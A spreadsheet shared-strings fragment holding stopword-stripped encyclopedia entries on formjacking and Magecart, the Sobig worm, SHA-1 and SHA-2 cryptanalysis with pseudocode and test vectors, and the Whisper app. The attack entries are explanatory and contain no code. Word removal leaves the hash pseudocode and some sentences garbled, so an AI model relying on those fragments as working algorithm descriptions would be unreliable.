  </si>
  <si>
    <t>skimming, formjacking magecart attack attack attacker injects malicious code website extracts data html form user filled that data submitted server control attacker. mitigation subresource integrity content security policy used protect formjacking, although protect supply chain attacks. application firewall also used. prevalence report 2016 suggested many 6,000 e-commerce sites compromised class attack. 2018, british airways 380,000 card details stolen class attack. similar attack affected ticketmaster year 40,000 customers affected maliciously injected code payment pages. magecart magecart software used range hacking groups injecting malicious code ecommerce sites steal payment details. well targeted attacks newegg, used combination commodity magento extension attacks. 'shopper approved' ecommerce toolkit utilised hundreds ecommerce sites also compromised magecart conspiracy site infowars.according malwarebytes, magecart software tried avoid detection using webgl check whether used renderer either "swiftshader", "llvmpipe" "virtualbox", would indicated software running virtual machine thus real world victim. references</t>
  </si>
  <si>
    <t>Sobig</t>
  </si>
  <si>
    <t>sobig worm computer worm infected millions internet-connected, microsoft windows computers august 2003. although indications tests worm carried early august 2002, sobig.a first found wild january 2003. sobig.b released 2003. first called palyh, later renamed sobig.b anti-virus experts discovered generation sobig. sobig.c released fixed timing sobig.b. sobig.d came couple weeks later followed sobig.e june august sobig.f became known record sheer volume e-mails. worm widespread "sobig.f" variant. 2018, sobig second fastest computer worm ever entered wild, surpassed mydoom. sobig computer worm sense replicates itself, also trojan horse masquerades something malware. sobig.f worm appear electronic mail following subjects: approved details details thank you! that movie wicked screensaver your application thank you! your detailsit contain text: "see attached file details" "please attached file details." also contains attachment following names: application.pif details.pif document_9446.pif document_all.pif movie0045.pif thank_you.pif your_details.pif your_document.pif wicked_scr.scr technical details sobig viruses infect host computer above-mentioned attachment. when started replicate using smtp agent engine. e-mail addresses targeted virus gathered files host computer. file extensions searched e-mail addresses are: .dbx .eml .hlp .htm .html .mht .wab .txtthe sobig.f variant programmed contact addresses port 8998 august 2003 install program update itself. unclear program was, earlier versions virus installed wingate proxy server software—a legitimate product—in configuration allowing used backdoor spammers distribute unsolicited e-mail. sobig worm written using microsoft visual compiler, subsequently compressed using data compression program called telock. sobig.f worm deactivated september 2003. november year, microsoft announced $250,000 information leading arrest creator sobig worm. date, perpetrator caught. also timeline notable computer viruses worms</t>
  </si>
  <si>
    <t>SHA-1</t>
  </si>
  <si>
    <t>cryptography, sha-1 (secure hash algorithm cryptographically broken still widely used hash function takes input produces 160-bit (20-byte) hash value known message digest typically rendered hexadecimal number, digits long. designed united states national security agency, u.s. federal information processing standard.since 2005, sha-1 considered secure well-funded opponents; 2010 many organizations recommended replacement. nist formally deprecated sha-1 2011 disallowed digital signatures 2013. 2020, chosen-prefix attacks sha-1 practical. such, recommended remove sha-1 products soon possible instead sha-2 sha-3. replacing sha-1 urgent used digital signatures. major browser vendors ceased acceptance sha-1 certificates 2017. february 2017, amsterdam google announced performed collision attack sha-1, publishing dissimilar files produced sha-1 hash. however, sha-1 still secure hmac.microsoft discontinued sha-1 code signing support windows update august 2020. development sha-1 produces message digest based principles similar used ronald rivest design md2, message digest algorithms, generates larger hash value (160 bits bits). sha-1 developed part u.s. government's capstone project. original specification algorithm published 1993 title secure hash standard, fips 180, u.s. government standards agency nist (national institute standards technology). this version often named sha-0. withdrawn shortly publication superseded revised version, published 1995 fips 180-1 commonly designated sha-1. sha-1 differs sha-0 single bitwise rotation message schedule compression function. according nsa, done correct flaw original algorithm reduced cryptographic security, provide explanation. publicly available techniques indeed demonstrate compromise sha-0, 2004, sha-1 2017. #attacks applications cryptography sha-1 forms part several widely used security applications protocols, including ssl, pgp, ssh, s/mime, ipsec. those applications also md5; sha-1 descended md4. sha-1 sha-2 hash algorithms required certain u.s. government applications, including within cryptographic algorithms protocols, protection sensitive unclassified information. fips 180-1 also encouraged adoption sha-1 private commercial organizations. sha-1 retired government uses; u.s. national institute standards technology said, "federal agencies stop using sha-1 for...applications require collision resistance soon practical, must sha-2 family hash functions applications 2010" (emphasis original), though later relaxed allow sha-1 used verifying digital signatures time stamps.a prime motivation publication secure hash algorithm digital signature standard, incorporated. hash functions used basis shacal block ciphers. data integrity revision control systems git, mercurial, monotone sha-1, security, identify revisions ensure data changed accidental corruption. linus torvalds said git: disk corruption, dram corruption, kind problems all, notice them. it's question guarantee. people malicious. they succeed. [...] nobody able break sha-1, point sha-1, concerned, even security feature. it's purely consistency check. security parts elsewhere, people assume since uses sha-1 sha-1 used cryptographically secure stuff, think that, okay, huge security feature. nothing security, best hash get. guarantee you, data git, trust fact five years later, converted hard disk whatever technology copied along, five years later verify data back exact data [...] reasons care kernel, break bitkeeper sites people tried corrupt kernel source code repositories.however require second preimage resistance sha-1 security feature, since always prefer keep earliest version object case collision, preventing attacker surreptitiously overwriting files. cryptanalysis validation hash function number bits message digest, finding message corresponds given message digest always done using brute force search approximately evaluations. this called preimage attack practical depending particular computing environment. however, collision, consisting finding different messages produce message digest, requires average 2l/2 evaluations using birthday attack. thus strength hash function usually compared symmetric cipher half message digest length. sha-1, 160-bit message digest, originally thought 80-bit strength. some applications cryptographic hashes, like password storage, minimally affected collision attack. constructing password works given account requires preimage attack, well access hash original password, trivial. reversing password encryption (e.g. obtain password user's account elsewhere) made possible attacks. (however, even secure password hash can't prevent brute-force attacks weak passwords.) case document signing, attacker could simply fake signature existing document: attacker would produce pair documents, innocuous damaging, private holder sign innocuous document. there practical circumstances possible; 2008, possible create forged certificates using collision.due block iterative structure algorithms absence additional final steps, functions (except sha-3) vulnerable length-extension partial-message collision attacks. these attacks allow attacker forge message signed keyed hash sha(message key) sha(key message) extending message recalculating hash without knowing key. simple improvement prevent attacks hash twice: shad(message) sha(sha(0b message)) (the length zero block, equal block size hash function). sha-0 crypto french researchers, florent chabaud antoine joux, presented attack sha-0: collisions found complexity 261, fewer ideal hash function size.in 2004, biham chen found near-collisions sha-0 messages hash nearly value; case, bits equal. they also found full collisions sha-0 reduced rounds.subsequently, august 2004, collision full sha-0 algorithm announced joux, carribault, lemuet, jalby. this done using generalization chabaud joux attack. finding collision complexity took 80,000 processor-hours supercomputer itanium processors (equivalent days full-time computer). august 2004, rump session crypto 2004, preliminary results announced wang, feng, lai, attack md5, sha-0 hash functions. complexity attack sha-0 240, significantly better attack joux al.in february 2005, attack xiaoyun wang, yiqun lisa yin, hongbo announced could find collisions sha-0 operations.another attack 2008 applying boomerang attack brought complexity finding collisions 233.6, estimated take hour average year 2008.in light results sha-0, experts suggested plans sha-1 cryptosystems reconsidered. after crypto 2004 results published, nist announced planned phase sha-1 2010 favor sha-2 variants. attacks early 2005, vincent rijmen elisabeth oswald published attack reduced version sha-1 rounds finds collisions computational effort fewer operations.in february 2005, attack xiaoyun wang, yiqun lisa yin, hongbo announced. attacks find collisions full version sha-1, requiring fewer operations. brute-force search would require operations.) authors write: particular, analysis built upon original differential attack sha-0, near collision attack sha-0, multiblock collision techniques, well message modification techniques used collision search attack md5. breaking sha-1 would possible without powerful analytical techniques." authors presented collision 58-round sha-1, found hash operations. paper full attack description published august 2005 crypto conference. interview, states that, "roughly, exploit following weaknesses: file preprocessing step complicated enough; another certain math operations first rounds unexpected security problems."on august 2005, improvement sha-1 attack announced behalf xiaoyun wang, andrew frances crypto 2005 rump session, lowering complexity required finding collision sha-1 263. december 2007 details result explained verified martin cochran.christophe cannière christian rechberger improved attack sha-1 "finding sha-1 characteristics: general results applications," receiving best paper award asiacrypt 2006. two-block collision 64-round sha-1 presented, found using unoptimized methods compression function evaluations. since attack requires equivalent evaluations, considered significant theoretical break. their attack extended rounds 2010 grechnikov. order find actual collision full rounds hash function, however, tremendous amounts computer time required. end, collision search sha-1 using distributed computing platform boinc began august 2007, organized graz university technology. effort abandoned 2009 lack progress.at rump session crypto 2006, christian rechberger christophe cannière claimed discovered collision attack sha-1 would allow attacker select least parts message.in 2008, attack methodology stéphane manuel reported hash collisions estimated theoretical complexity operations. however later retracted claim finding local collision paths actually independent, finally quoting efficient collision vector already known work.cameron mcdonald, philip hawkes josef pieprzyk presented hash collision attack claimed complexity rump session eurocrypt 2009. however, accompanying paper, "differential path sha-1 complexity o(252)" withdrawn authors' discovery estimate incorrect.one attack sha-1 marc stevens estimated cost $2.77m(2012) break single hash value renting power cloud servers. stevens developed attack project called hashclash, implementing differential path attack. november 2010, claimed fully working near-collision attack full sha-1 working estimated complexity equivalent 257.5 sha-1 compressions. estimated attack could extended full collision complexity around 261. shappening october 2015, marc stevens, pierre karpman, thomas peyrin published freestart collision attack sha-1's compression function requires sha-1 evaluations. this directly translate collision full sha-1 hash function (where attacker able freely choose initial internal state), undermines security claims sha-1. particular, first time attack full sha-1 demonstrated; earlier attacks expensive authors carry out. authors named significant breakthrough cryptanalysis sha-1 shappening.the method based earlier work, well auxiliary paths boomerangs) speed-up technique joux peyrin, using high performance/cost efficient cards nvidia. collision found 16-node cluster total graphics cards. authors estimated similar collision could found buying us$2,000 time ec2.the authors estimated cost renting enough cpu/gpu time generate full collision sha-1 time publication us$75k 120k, noted well within budget criminal organizations, mention national intelligence agencies. such, authors recommended sha-1 deprecated quickly possible. shattered first public collision february 2017, (centrum wiskunde informatica) google announced shattered attack, generated different files sha-1 hash roughly 263.1 sha-1 evaluations. this attack 100,000 times faster brute forcing sha-1 collision birthday attack, estimated take sha-1 evaluations. attack required "the equivalent processing power 6,500 years single-cpu computations years single-gpu computations". birthday-near-collision attack first practical chosen-prefix attack april 2019 paper gaëtan leurent thomas peyrin presented eurocrypt 2019 described enhancement previously best chosen-prefix attack merkle–damgård–like digest functions based davies–meyer block ciphers. with improvements, method capable finding chosen-prefix collisions approximately sha-1 evaluations. this approximately billion times faster (and usable many targeted attacks, thanks possibility choosing prefix, example malicious code faked identities signed certificates) previous attack's 277.1 evaluations (but without chosen prefix, impractical targeted attacks found collisions almost random) fast enough practical resourceful attackers, requiring approximately $100,000 cloud processing. this method also capable finding chosen-prefix collisions function, complexity 246.3 surpass prior best available method theoretical level (239), though potentially practical level (≤249). this attack memory requirement 500+ january 2020 authors published improved attack. paper demonstrate chosen-prefix collision attack complexity 263.4, time publication would cost generated collision. official validation implementations fips-approved security functions officially validated cmvp program, jointly national institute standards technology (nist) communications security establishment (cse). informal verification, package generate high number test vectors made available download nist site; resulting verification, however, replace formal cmvp validation, required certain applications. december 2013, 2000 validated implementations sha-1, capable handling messages length bits multiple eight (see validation list archived 2011-08-23 wayback machine). examples pseudocode example hashes these examples sha-1 message digests hexadecimal base64 binary ascii text encoding. sha1("the quick brown jumps lazy dog") outputted hexadecimal: 2fd4e1c67a2d28fced849ee1bb76e7391b93eb12 outputted base64 binary ascii text encoding: l9thxnotkpzthj7hu3bnorut6xi=even small change message will, overwhelming probability, result many bits changing avalanche effect. example, changing produces hash different values bits: sha1("the quick brown jumps lazy cog") outputted hexadecimal: de9f2c7fd25e1b3afad3e85a0bd17d9b100db4b3 outputted base64 binary ascii text encoding: 3p8sf9jegzr60+hac9f9mxantlm=the hash zero-length string sha1("") outputted hexadecimal: da39a3ee5e6b4b0d3255bfef95601890afd80709 outputted base64 binary ascii text encoding: 2jmj7l5rsw0yvb/vlwaykk/ybwk= sha-1 pseudocode pseudocode sha-1 algorithm follows: note variables unsigned 32-bit quantities wrap modulo calculating, except message length, 64-bit quantity, message digest, 160-bit quantity. note constants pseudo code endian. within word, significant byte stored leftmost byte position initialize variables: 0x67452301 0xefcdab89 0x98badcfe 0x10325476 0xc3d2e1f0 message length bits (always multiple number bits character). pre-processing: append message e.g. adding 0x80 message length multiple bits. append bits '0', resulting message length bits congruent (mod 512) append original message length bits, 64-bit big-endian integer. thus, total length multiple bits. process message successive 512-bit chunks: break message 512-bit chunks chunk break chunk sixteen 32-bit big-endian words w[i], message schedule: extend sixteen 32-bit words eighty 32-bit words: note sha-0 differs leftrotate. w[i] (w[i-3] w[i-8] w[i-14] w[i-16]) leftrotate initialize hash value chunk: main loop: ((not 0x5a827999 else 0x6ed9eba1 else 0x8f1bbcdc else 0xca62c1d6 temp leftrotate w[i] leftrotate temp chunk's hash result far: produce final hash value (big-endian) 160-bit number: leftshift 128) leftshift leftshift leftshift number message digest, written hexadecimal (base 16). chosen constant values used algorithm assumed nothing sleeve numbers: four round constants times square roots however incorrectly rounded nearest integer instead rounded nearest integer, equilibrated proportions zero bits. well, choosing square root (which prime) made common factor chosen square roots primes possibly usable arithmetic properties across successive rounds, reducing strength algorithm finding collisions bits. first four starting values algorithm, fifth (for similar. however properly verified resistant inversion first rounds infer possible collisions bits, usable multiblock differential attacks.instead formulation original fips 180-1 shown, following equivalent expressions used compute main loop above: bitwise choice controlled 19): (alternative 19): ((not (alternative 19): ((not (alternative 19): vec_sel(d, (alternative [premo08] bitwise majority function. 59): (alternative 59): (alternative 59): (alternative 59): (alternative 59): vec_sel(c, (alternative also shown rounds 32–79 computation w[i] (w[i-3] w[i-8] w[i-14] w[i-16]) leftrotate replaced with: w[i] (w[i-6] w[i-16] w[i-28] w[i-32]) leftrotate this transformation keeps operands 64-bit aligned and, removing dependency w[i] w[i-3], allows efficient simd implementation vector length like instructions. comparison functions table below, internal state means "internal hash sum" compression data block. implementations below list cryptography libraries support sha-1: botan bouncy castle cryptlib crypto++ libgcrypt mbed nettle libressl openssl gnutls hardware acceleration provided following processor extensions: intel extensions: available intel processors. padlock z/architecture: available since 2003 part message-security-assist extension also comparison cryptographic hash functions hash function security summary international association cryptologic research secure hash standard notes references external links csrc cryptographic toolkit official nist site secure hash standard fips 180-4: secure hash standard (shs) 3174 (with sample implementation) interview yiqun lisa concerning attack sha-1 explanation successful attacks sha-1 pages, 2006) cryptography research hash collision sha-1 curlie lecture sha-1 18m) youtube christof paar</t>
  </si>
  <si>
    <t>SHA-2</t>
  </si>
  <si>
    <t>sha-2 (secure hash algorithm cryptographic hash functions designed united states national security agency (nsa) first published 2001. they built using merkle–damgård construction, one-way compression function built using davies–meyer structure specialized block cipher. sha-2 includes significant changes predecessor, sha-1. sha-2 family consists hash functions digests (hash values) 224, 256, bits: sha-224, sha-256, sha-384, sha-512, sha-512/224, sha-512/256. sha-256 sha-512 novel hash functions computed eight 32-bit 64-bit words, respectively. they different shift amounts additive constants, structures otherwise virtually identical, differing number rounds. sha-224 sha-384 truncated versions sha-256 sha-512 respectively, computed different initial values. sha-512/224 sha-512/256 also truncated versions sha-512, initial values generated using method described federal information processing standards (fips) 180-4. sha-2 first published national institute standards technology (nist) u.s. federal standard (fips). sha-2 family algorithms patented united states released patent royalty-free license.as 2011, best public attacks break preimage resistance rounds sha-256 rounds sha-512, collision resistance rounds sha-256. hash standard with publication fips 180-2, nist added three additional hash functions family. algorithms collectively known sha-2, named digest lengths bits): sha-256, sha-384, sha-512. algorithms first published 2001 draft fips 180-2, time public review comments accepted. august 2002, fips 180-2 became secure hash standard, replacing fips 180-1, released april 1995. updated standard included original sha-1 algorithm, updated technical notation consistent describing inner workings sha-2 family.in february 2004, change notice published fips 180-2, specifying additional variant, sha-224, defined match length two-key triple des. october 2008, standard updated fips 180-3, including sha-224 change notice, otherwise making fundamental changes standard. primary motivation updating standard relocating security information hash algorithms recommendations special publications 800-107 800-57. detailed test data example message digests also removed standard, provided separate documents.in january 2011, nist published sp800-131a, specified move then-current minimum 80-bit security (provided sha-1) allowable federal government 2013, 112-bit security (provided sha-2) minimum requirement (starting 2014) recommended security level (starting publication date 2011).in march 2012, standard updated fips 180-4, adding hash functions sha-512/224 sha-512/256, describing method generating initial values truncated versions sha-512. additionally, restriction padding input data prior hash calculation removed, allowing hash data calculated simultaneously content generation, real-time video audio feed. padding final data block must still occur prior hash output.in july 2012, nist revised sp800-57, provides guidance cryptographic management. publication disallowed creation digital signatures hash security lower bits 2013. previous revision 2007 specified cutoff 2010. august 2012, nist revised sp800-107 manner.the nist hash function competition selected hash function, sha-3, 2012. sha-3 algorithm derived sha-2. applications sha-2 hash function implemented widely used security applications protocols, including ssl, pgp, ssh, s/mime, ipsec. sha-256 used authenticating debian software packages dkim message signing standard; sha-512 part system authenticate archival video international criminal tribunal rwandan genocide. sha-256 sha-512 proposed dnssec. unix linux vendors moving using 256- 512-bit sha-2 secure password hashing.several cryptocurrencies, including bitcoin, sha-256 verifying transactions calculating proof work proof stake. rise asic sha-2 accelerator chips scrypt-based proof-of-work schemes. sha-1 sha-2 secure hash algorithms required certain u.s. government applications, including within cryptographic algorithms protocols, protection sensitive unclassified information. fips 180-1 also encouraged adoption sha-1 private commercial organizations. sha-1 retired government uses; u.s. national institute standards technology says, "federal agencies stop using sha-1 for...applications require collision resistance soon practical, must sha-2 family hash functions applications 2010" (emphasis original). nist's directive u.s. government agencies must stop uses sha-1 2010 hoped accelerate migration away sha-1. sha-2 functions quickly adopted initially, despite better security sha-1. reasons might include lack support sha-2 systems running windows older lack perceived urgency since sha-1 collisions found. google chrome team announced plan make browser gradually stop honoring sha-1-dependent certificates period late 2014 early 2015. similarly, microsoft announced internet explorer edge would stop honoring public sha-1-signed certificates february 2017. mozilla disabled sha-1 early january 2016, re-enable temporarily firefox update, problems web-based user interfaces router models security appliances. cryptanalysis validation hash function number bits message digest, finding message corresponds given message digest always done using brute force search evaluations. this called preimage attack practical depending particular computing environment. second criterion, finding different messages produce message digest, known collision, requires average 2l/2 evaluations using birthday attack. some applications cryptographic hashes, password storage, minimally affected collision attack. constructing password works given account requires preimage attack, well access hash original password (typically shadow file) trivial. reversing password encryption (e.g., obtain password user's account elsewhere) made possible attacks. (however, even secure password hash cannot prevent brute-force attacks weak passwords.) case document signing, attacker could simply fake signature existing document—the attacker would produce pair documents, innocuous damaging, private holder sign innocuous document. there practical circumstances possible; 2008, possible create forged certificates using collision would accepted widely used browsers.increased interest cryptographic hash analysis sha-3 competition produced several attacks sha-2 family, best given table below. only collision attacks practical complexity; none attacks extend full round hash function. 2012, researchers sony gave presentation suggesting pseudo-collision attacks could extended rounds sha-256 rounds sha-512 building upon biclique pseudo-preimage attack. official validation implementations fips-approved security functions officially validated cmvp program, jointly national institute standards technology (nist) communications security establishment (cse). informal verification, package generate high number test vectors made available download nist site; resulting verification, however, replace formal cmvp validation, required certain applications. december 2013, 1300 validated implementations sha-256 sha-512, capable handling messages length bits multiple eight supporting variants. test vectors hash values empty string (i.e., zero-length input text). sha224("") d14a028c2a3a2bc9476102bb288234c415a2b01f828ea62ac5b3e42f sha256("") e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 sha384("") 38b060a751ac96384cd9327eb1b1e36a21fdb71114be07434c0cc7bf63f6e1da274edebfe76f65fbd51ad2f14898b95b sha512("") cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e sha512/224("") 6ed0dd02806fa89e25de060c19d3ac86cabb87d6a0ddd05c333b84f4 sha512/256("") c672b8d1ef56ed28ab87c3622c5114069bdd3ad7b8f9737498d0c01ecef0967a even small change message (with overwhelming probability) result mostly different hash, avalanche effect. example, adding period following sentence changes almost half (111 224) bits hash: sha224("the quick brown jumps lazy dog") 730e109bd7a8a32b1cb9d9a09aa2325d2430587ddbc0c38bad911525 sha224("the quick brown jumps lazy dog.") 619cba8e8e05826e9b8c519c0a5c68f4fb653e8a3d8aa04bb2c8cd4c pseudocode pseudocode sha-256 algorithm follows. note great increase mixing bits w[16..63] words compared sha-1. note variables unsigned integers addition calculated modulo note round, round constant k[i] entry message schedule array w[i], note compression function uses working variables, note big-endian convention used expressing constants pseudocode, parsing message block data bytes words, example, first word input message "abc" padding 0x61626380 initialize hash values: (first bits fractional parts square roots first primes 2..19): 0x6a09e667 0xbb67ae85 0x3c6ef372 0xa54ff53a 0x510e527f 0x9b05688c 0x1f83d9ab 0x5be0cd19 initialize array round constants: (first bits fractional parts cube roots first primes 2..311): k[0..63] 0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5, 0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5, 0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3, 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174, 0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc, 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da, 0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7, 0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967, 0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13, 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85, 0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3, 0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070, 0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5, 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3, 0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208, 0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2 pre-processing (padding): begin original message length bits append single append bits, minimum number multiple append 64-bit big-endian integer, making total post-processed length multiple bits bits message are: &lt;original message length zeros&gt; integer&gt; (the number bits multiple 512) process message successive 512-bit chunks: break message 512-bit chunks chunk create 64-entry message schedule array w[0..63] 32-bit words (the initial values w[0..63] matter, many implementations zero here) copy chunk first words w[0..15] message schedule array extend first words remaining words w[16..63] message schedule array: (w[i-15] rightrotate (w[i-15] rightrotate (w[i-15] rightshift (w[i-2] rightrotate (w[i-2] rightrotate (w[i-2] rightshift w[i] w[i-16] w[i-7] initialize working variables current hash value: compression function main loop: rightrotate rightrotate rightrotate ((not temp1 k[i] w[i] rightrotate rightrotate rightrotate temp2 temp1 temp1 temp2 compressed chunk current hash value: produce final hash value (big-endian): digest hash append append append append append append append computation values optimized described sha-1. sha-224 identical sha-256, except that: initial hash values different, output constructed omitting h7.sha-224 initial hash values endian): (the second bits fractional parts square roots 16th primes 23..53) h[0..7] 0xc1059ed8, 0x367cd507, 0x3070dd17, 0xf70e5939, 0xffc00b31, 0x68581511, 0x64f98fa7, 0xbefa4fa4 sha-512 identical structure sha-256, but: message broken 1024-bit chunks, initial hash values round constants extended bits, rounds instead message schedule array 64-bit words instead 32-bit words, extend message schedule array loop instead round constants based first primes 2..409, word size used calculations bits long, appended length message (before pre-processing), bits, 128-bit big-endian integer, shift rotate amounts used different.sha-512 initial hash values big-endian): h[0..7] 0x6a09e667f3bcc908, 0xbb67ae8584caa73b, 0x3c6ef372fe94f82b, 0xa54ff53a5f1d36f1, 0x510e527fade682d1, 0x9b05688c2b3e6c1f, 0x1f83d9abfb41bd6b, 0x5be0cd19137e2179 sha-512 round constants: k[0..79] 0x428a2f98d728ae22, 0x7137449123ef65cd, 0xb5c0fbcfec4d3b2f, 0xe9b5dba58189dbbc, 0x3956c25bf348b538, 0x59f111f1b605d019, 0x923f82a4af194f9b, 0xab1c5ed5da6d8118, 0xd807aa98a3030242, 0x12835b0145706fbe, 0x243185be4ee4b28c, 0x550c7dc3d5ffb4e2, 0x72be5d74f27b896f, 0x80deb1fe3b1696b1, 0x9bdc06a725c71235, 0xc19bf174cf692694, 0xe49b69c19ef14ad2, 0xefbe4786384f25e3, 0x0fc19dc68b8cd5b5, 0x240ca1cc77ac9c65, 0x2de92c6f592b0275, 0x4a7484aa6ea6e483, 0x5cb0a9dcbd41fbd4, 0x76f988da831153b5, 0x983e5152ee66dfab, 0xa831c66d2db43210, 0xb00327c898fb213f, 0xbf597fc7beef0ee4, 0xc6e00bf33da88fc2, 0xd5a79147930aa725, 0x06ca6351e003826f, 0x142929670a0e6e70, 0x27b70a8546d22ffc, 0x2e1b21385c26c926, 0x4d2c6dfc5ac42aed, 0x53380d139d95b3df, 0x650a73548baf63de, 0x766a0abb3c77b2a8, 0x81c2c92e47edaee6, 0x92722c851482353b, 0xa2bfe8a14cf10364, 0xa81a664bbc423001, 0xc24b8b70d0f89791, 0xc76c51a30654be30, 0xd192e819d6ef5218, 0xd69906245565a910, 0xf40e35855771202a, 0x106aa07032bbd1b8, 0x19a4c116b8d2d0c8, 0x1e376c085141ab53, 0x2748774cdf8eeb99, 0x34b0bcb5e19b48a8, 0x391c0cb3c5c95a63, 0x4ed8aa4ae3418acb, 0x5b9cca4f7763e373, 0x682e6ff3d6b2b8a3, 0x748f82ee5defb2fc, 0x78a5636f43172f60, 0x84c87814a1f0ab72, 0x8cc702081a6439ec, 0x90befffa23631e28, 0xa4506cebde82bde9, 0xbef9a3f7b2c67915, 0xc67178f2e372532b, 0xca273eceea26619c, 0xd186b8c721c0c207, 0xeada7dd6cde0eb1e, 0xf57d4f7fee6ed178, 0x06f067aa72176fba, 0x0a637dc5a2c898a6, 0x113f9804bef90dae, 0x1b710b35131c471b, 0x28db77f523047d84, 0x32caab7b40c72493, 0x3c9ebe0a15c9bebc, 0x431d67c49c100d4c, 0x4cc5d4becb3e42b6, 0x597f299cfc657e2a, 0x5fcb6fab3ad6faec, 0x6c44198c4a475817 sha-512 sigma: rightrotate rightrotate rightrotate rightrotate rightrotate rightrotate (w[i-15] rightrotate (w[i-15] rightrotate (w[i-15] rightshift (w[i-2] rightrotate (w[i-2] rightrotate (w[i-2] rightshift sha-384 identical sha-512, except that: initial hash values different (taken 16th primes), output constructed omitting h7.sha-384 initial hash values big-endian): h[0..7] 0xcbbb9d5dc1059ed8, 0x629a292a367cd507, 0x9159015a3070dd17, 0x152fecd8f70e5939, 0x67332667ffc00b31, 0x8eb44a8768581511, 0xdb0c2e0d64f98fa7, 0x47b5481dbefa4fa4 sha-512/t identical sha-512 except that: initial hash values given sha-512/t generation function, output constructed truncating concatenation bits, equal allowed, instead sha-384 used specified, values especially mentioned approved.the sha-512/t generation function evaluates modified sha-512 ascii string "sha-512/t", substituted decimal representation modified sha-512 sha-512 except initial values xored hexadecimal constant 0xa5a5a5a5a5a5a5a5. sample implementation sha-2 family hash functions found 6234. comparison functions table below, internal state means "internal hash sum" compression data block. bitwise operations column, "rot" stands rotate carry, "shr" stands right logical shift. algorithms employ modular addition fashion except sha-3. more detailed performance measurements modern processor architectures given table below. performance numbers labeled 'x86' running using 32-bit code 64-bit processors, whereas 'x86-64' numbers native 64-bit code. while sha-256 designed 32-bit calculations, benefit code optimized 64-bit processors architecture. 32-bit implementations sha-512 significantly slower 64-bit counterparts. variants algorithms different output sizes perform similarly, since message expansion compression functions identical, initial hash values output sizes different. best implementations sha-1 perform cycles byte modern processors. testing performed university illinois chicago hydra8 system running intel xeon e3-1275 clock speed ghz, hydra9 system running a10-5800k clock speed ghz. referenced cycles byte speeds median performance algorithm digesting 4,096 byte message using supercop cryptographic benchmarking software. mib/s performance extrapolated clockspeed single core; real-world performance vary variety factors. implementations below list cryptography libraries support sha-2: botan bouncy castle cryptlib crypto++ libgcrypt mbed libsodium nettle libressl openssl gnutls wolfsslhardware acceleration provided following processor extensions: intel extensions: available intel processors. padlock armv8 cryptography extensions z/architecture: available since 2005 part message-security-assist extensions (sha-256) (sha-512) also comparison cryptographic hash functions comparison cryptography libraries hash function security summary hashcash hmac international association cryptologic research (iacr) sha1sum (sha224sum, sha256sum, sha384sum sha512sum) commands trusted timestamping references further reading external links descriptions sha-256, sha-384, sha-512 nist sha-2 checker shachecker check one's compatibility sha-2 specifications secure hash standard (shs) draft proposed (sha-0) secure hash standard (shs) proposed (sha-0) csrc cryptographic toolkit official nist site secure hash standard fips 180-4: secure hash standard (shs) (pdf, current version secure hash standard (sha-1, sha-224, sha-256, sha-384, sha-512), august 2015 test vectors sha-256/384/512 nessie project test vectors sha-1, sha-2 nist site nist cryptographic hash project sha-3 competition 3874: 224-bit one-way hash function: sha-224" 6234: secure hash algorithms (sha sha-based hmac hkdf)"; contains sample implementation sha-256 algorithm demonstration</t>
  </si>
  <si>
    <t>Whisper (app)</t>
  </si>
  <si>
    <t>whisper proprietary android mobile available without charge. form anonymous social media, allowing users post share photo video messages anonymously, although claim challenged privacy concerns whisper's handling user data. postings, called "whispers", consist text superimposed image, background imagery either automatically retrieved whisper's search engine uploaded user. app, launched march 2012, main product media company whispertext llc, co-founded michael heyward, entertainment executive andy heyward, brad brooks, mobile messaging service tigertext. since 2015, service sought become brand advertising platform, promotional partnerships netflix, nbcuniversal, disney, hbo, mtv. according techcrunch, march 2017, whisper total billion monthly pageviews mobile desktop websites, social channels publisher network, million monthly users across countries. owned medialab. features alexis madrigal atlantic describes service follows: anyone post anonymous message service form image macro: text overlaid picture. when open app, images. each "secret" respond message publicly privately, choosing public anonymous post private pseudonymous chat. users public identity app. while persistent handles, there's contact except *through* messages post. user base april 2015, whisper reached million monthly active users. stories appeared forbes, today, washington post, huffington post, heyward featured forbes' technology list january 2014. early november 2013, whisper reported reached billion monthly page views nearly billion page views december 2013. whisper billion monthly page views spring 2015. december 2015, reported whisper reached million active users, double number users months earlier. april 2016, reported whisper reached million monthly active users. terms demographics, york times named whisper september 2015 social media platform choice generation article internet habits among generation millennials. june 2017, whisper's usership ages predominantly female, reported fast company magazine, also added that: "according crowdtangle data, whisper's facebook page top-performing media page interactions social network approximately million interactions fiscal year 2016. metrics correct, whisper outperformed cnn, vice, buzzfeed facebook interactions." concept york describes whisper "the place days vent, come clean, peer people's secrets," goal "turning confessions content."the purports promote online anonymity, developer claims prevent combat cyberbullying. october 2015, whisper announced partnership council witness" anti-bullying campaign, along tech companies, including facebook, twitter, snapchat, march 2016, whisper announced partnership anti-defamation league's best practices responding online hate. service's anonymity claimed fostered support network concern care among users developed: according mashable, "the team regularly hears users network's community helped stop self-harming behaviors." another premise behind service counter "best possible self" ego-driven self-aggrandizing "vanity" posting done facebook, antidote phenomenon "oversharing" "too much information" young users engage online. business insider, forbes, daily called "the anti-facebook," forbes tech drew contrast stating that, "whisper, even snapchat, anti-facebook." digital-news website summed points together: addition preventing cyber bullies, whisper gives users opportunity confess things could potentially ruin marriages, friendships result loss job, without suffering consequences. share without 